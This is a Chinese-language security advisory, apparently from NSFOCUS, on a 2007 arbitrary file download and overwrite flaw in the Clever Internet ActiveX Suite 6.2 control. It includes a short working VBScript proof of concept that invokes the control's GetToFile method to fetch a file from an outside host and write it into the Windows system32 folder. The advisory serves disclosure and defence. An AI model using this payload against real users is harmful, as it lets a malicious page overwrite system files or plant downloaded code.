安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Clever Internet ActiveX套件CLINetSuiteX6.OCX任意文件下载或覆盖漏洞
发布日期:
2007-07-25
更新日期:
2007-07-27
受影响系统:
Clever Components Clever Internet ActiveX Suite 6.2
描述:
BUGTRAQ ID:
25063
Clever Internet Suite是一款网络控件程序集,提供上传、下载和Email收发等功能,还可以通过数据压缩恢复数据。
Clever Internet Suite中包含的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞覆盖系统上的任意文件。
Clever Internet套件中的clInetSuiteX6.clWebDav(clinetsuitex6.ocx)ActiveX控件包含有不安全的GetToFile()方式,该方式允许由参数指定下载和保存文件。如果用户受骗访问了恶意网页的话,就可能导致以登录用户的权限覆盖和破坏系统上的任意文件,或下载任意文件并将其保存到系统上的任意位置。
<*来源:shinnai (
shinnai@autistici.org
)
链接:
http://secunia.com/advisories/26213/
http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Exploits&argument=Remote&topic=118536
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:E8F92847-7C21-452B-91A5-49D93AA18F30' id='test' ></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe()
test.GetToFile "
http://www.shinnai.altervista.org/shinnai.txt"
,"c:\windows\system32\shinnai.txt"
MsgBox("Exploit completed!")
End Sub
</script>
建议:
厂商补丁:
Clever Components
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.clevercomponents.com/
浏览次数:
2583
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客